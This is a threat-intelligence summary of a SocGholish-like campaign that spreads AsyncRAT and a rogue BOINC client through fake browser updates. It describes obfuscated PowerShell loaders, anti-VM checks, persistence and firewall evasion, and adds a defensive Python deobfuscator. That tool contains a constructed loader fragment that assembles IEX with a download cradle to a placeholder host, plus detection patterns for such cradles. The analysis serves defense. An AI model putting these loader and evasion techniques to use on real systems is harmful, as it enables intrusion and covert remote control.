Malware Chain With Signs of SocGholish Exploits BOINC Software
A malware campaign bearing the hallmarks of SocGholish (also known as FakeUpdates) was observed on July 4, 2024 distributing AsyncRAT and abusing the legitimate BOINC (Berkeley Open Infrastructure for Network Computing) client. Huntress found that the campaign reaches victims through malicious JavaScript served from compromised websites, which displays fake browser-update prompts. When a user accepts the prompt, a multi-stage infection chain starts; as Huntress explains, "two disjointed chains occur, with one resulting in a fileless variant of AsyncRAT and the other ending in a malicious BOINC (Berkeley Open Infrastructure Network Computing Client) installation." The tactics, techniques, and procedures (TTPs) overlap significantly with earlier SocGholish campaigns and with behavior reported by users on the BOINC project forum. The campaign relies heavily on obfuscation, most visibly in its PowerShell scripts, and on the abuse of legitimate software for malicious ends.
The infection chain begins with a malicious JavaScript file that downloads further payloads. The PowerShell loaders are heavily obfuscated; Huntress identified character arrays and layered encoding schemes used to evade detection. The script works through several stages of decoding and decryption before handing the result to PowerShell's Invoke-Expression (IEX) to run the next stage. It also performs anti-VM checks, each of which contributes to a "VM threshold" score that decides whether the malware continues executing in what it judges to be a virtual environment. A domain generation algorithm (DGA) for reaching command and control (C2) servers is another of the campaign's evasion measures. One of the final payloads is AsyncRAT, which communicates with a domain registered as recently as July 11, 2024.
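Character-array and base64 layers of the kind described above can usually be unwrapped statically, without ever running the script. The following Python is an added example written for this summary, not code from Huntress or from the campaign: it rewrites `[char]N+[char]N` concatenations, `-join [char[]](...)` arrays and `Encoding::GetString(Convert::FromBase64String(...))` wrappers into plain single-quoted PowerShell literals, then reports whether the unwrapped text reaches an IEX stage and a download cradle. The loader fragment, its variable names and the URL on example.invalid are constructed for the example.

```python
"""Statically unwrap character-array and base64 layers from a PowerShell loader.

Added example for this summary; not the campaign's loader and not Huntress code.
Nothing is executed: the layers are rewritten with regular expressions into
plain single-quoted PowerShell string literals, so the result can be read
(or fed to further detection logic) safely.
"""
import base64
import re

# Constructed sample fragment imitating the obfuscation style described above.
# The URL (example.invalid) and variable names are made up for this example.
SAMPLE = (
    "$a = [char]105+[char]101+[char]120\n"
    "$u = -join [char[]](104,116,116,112,115,58,47,47,101,120,97,109,112,108,"
    "101,46,105,110,118,97,108,105,100,47,112)\n"
    "$b = [System.Text.Encoding]::UTF8.GetString([System.Convert]::"
    "FromBase64String('" + base64.b64encode(b"Invoke-WebRequest").decode() + "'))\n"
    "& $a ($b + ' ' + $u)\n"
)

# [char]73+[char]69+[char]88  ->  'IEX'
CHAR_CONCAT = re.compile(r"\[char\]\s*\d+(?:\s*\+\s*\[char\]\s*\d+)*", re.I)
# -join [char[]](73,69,88)  or  [char[]](73,69,88) -join ''  ->  'IEX'
CHAR_ARRAY_JOIN = re.compile(
    r"-join\s*\[char\[\]\]\s*\(\s*([\d\s,]+?)\s*\)"
    r"|\[char\[\]\]\s*\(\s*([\d\s,]+?)\s*\)\s*-join\s*(?:''|\"\")",
    re.I,
)
# [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('...'))  ->  '...'
B64_GETSTRING = re.compile(
    r"\[(?:System\.)?Text\.Encoding\]::(UTF8|ASCII|Unicode)\.GetString\(\s*"
    r"\[(?:System\.)?Convert\]::FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)",
    re.I,
)
CODEC = {"utf8": "utf-8", "ascii": "ascii", "unicode": "utf-16-le"}


def _literal(text):
    """Emit a PowerShell single-quoted literal (only ' needs doubling)."""
    return "'" + text.replace("'", "''") + "'"


def _concat_repl(m):
    return _literal("".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))))


def _array_repl(m):
    digits = m.group(1) or m.group(2)
    return _literal("".join(chr(int(n)) for n in re.findall(r"\d+", digits)))


def _b64_repl(m):
    raw = base64.b64decode(m.group(2))
    return _literal(raw.decode(CODEC[m.group(1).lower()], errors="replace"))


def peel_char_arrays(script, max_rounds=10):
    """Apply the rewrites until the text stops changing (layers may nest)."""
    for _ in range(max_rounds):
        step = CHAR_CONCAT.sub(_concat_repl, script)
        step = CHAR_ARRAY_JOIN.sub(_array_repl, step)
        step = B64_GETSTRING.sub(_b64_repl, step)
        if step == script:
            break
        script = step
    return script


def indicators(script):
    """Flag what the unwrapped text reveals: an IEX stage and a download cradle."""
    low = script.lower()
    return {
        "invoke_expression": re.search(r"\b(?:iex|invoke-expression)\b", low) is not None,
        "download_cradle": re.search(
            r"invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|net\.webclient", low
        ) is not None,
        "urls": re.findall(r"https?://[^\s'\"()]+", script),
    }


if __name__ == "__main__":
    decoded = peel_char_arrays(SAMPLE)
    print(decoded)
    print(indicators(decoded))
```

The rewrite loop is deliberately narrow: it only touches constructs whose value is fully determined by literals in the text, so it can never execute attacker logic. Anything it cannot resolve (a DGA routine, string reversal, arithmetic on variables) is left in place for an analyst to read.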
In addition, the campaign installs BOINC using PowerShell's Invoke-WebRequest (which Windows PowerShell also exposes under the alias curl) to download the installation package, which it then executes. The script creates registry entries under "HKCU:\Software\Microsoft" and registers scheduled tasks for persistence. BOINC is normally used for legitimate distributed computing projects, but here it is pointed at rogue servers that can issue commands to, and collect data from, infected hosts. Huntress identified two such servers, rosettahome[.]cn and rosettahome[.]top, whose WHOIS records show registration dates of June 23, 2024, and June 15, 2024, respectively. As of 12:45 PM PST on July 15, 2024, 8,453 clients were connected to rosettahome[.]cn and 1,579 to rosettahome[.]top. Despite the large number of connections, Huntress noted that no computational tasks had been issued, suggesting the actors are using BOINC for initial access and reconnaissance rather than for immediate exploitation of the hosts.
Throughout the intrusion, Huntress observed further suspicious activity: frequent use of PowerShell to retrieve payloads with Invoke-WebRequest, Invoke-Expression, and curl; enumeration of local administrators; and persistent C2 connections established through headless conhost.exe commands. For defense evasion, the actors added a Windows Firewall rule named "SystemUpdate" that allows a DLL to communicate through the firewall. The use of standard administrative tools such as net.exe and netsh.exe for discovery and firewall configuration shows the adversaries' effort to blend malicious activity with legitimate system operations.